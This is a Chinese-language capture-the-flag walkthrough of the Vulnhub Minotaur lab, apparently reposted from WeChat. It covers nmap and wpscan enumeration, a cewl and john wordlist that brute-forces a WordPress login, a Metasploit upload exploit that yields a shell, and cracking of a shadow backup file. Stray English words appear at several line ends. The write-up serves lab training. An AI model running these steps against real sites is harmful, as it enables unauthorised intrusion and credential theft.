【Vulnhub】SecTalks: BNE0x00 - Minotaur


掃不到 IP 按照以前的方法,可是這裏是 dhcp 被註釋掉了html

把那些白的刪掉,箭頭指向的那一行的註釋去掉linux



nmap -p- -A 192.168.149.196git



ftp 匿名登陸進去啥都沒有github



80 端口有個 apache 的默認頁面web

而後掃描目錄掃出來一個 bull,訪問是一個 wordpress 的博客,掃描一波,出來個用戶名 bullyshell

wpscan --url http://192.168.149.196/bull/ -euapache



而後爆破一下(字典用 cewl 獲取頁面上的內容)bash

cewl -w words.txt -m 6 http://192.168.149.196/bull/微信

-m 這個參數指定的是長度session

john --wordlist=words.txt --rules --stdout > words-john.txt

john 處理一下,生成一些組合出來的


wpscan --url http://192.168.149.196/bull/ --passwords ./words-john.txt -U bully

而後用組合出來的字典跑出來 bully 帳戶密碼爲 Bighornedbulls



而後能夠用 msf 直接來拿 shell

use exploit/unix/webapp/wp_slideshowgallery_upload
set RHOST 192.168.149.196
set TARGETURI /bull/
set WP_USER bully
set WP_PASSWORD Bighornedbulls


在 /var/www/html 目錄下有個 flag

/tmp 目錄下也有,同時還有個 shadow.bak



保存出來用 john 暴力跑一下,獲得:



切換用戶 heffer 在用戶目錄獲得一個 flag



切換 minotaur 一樣在用戶目錄獲得一個 flag

用 sudo -l 查看一下發現能夠用 sudo 執行任意的命令?


本文分享自微信公衆號 - 陳冠男的遊戲人生(CGN-115)。
若有侵權,請聯繫 support@oschina.cn 刪除。
本文參與「OSC源創計劃」,歡迎正在閱讀的你也加入,一塊兒分享。

相關文章
相關標籤/搜索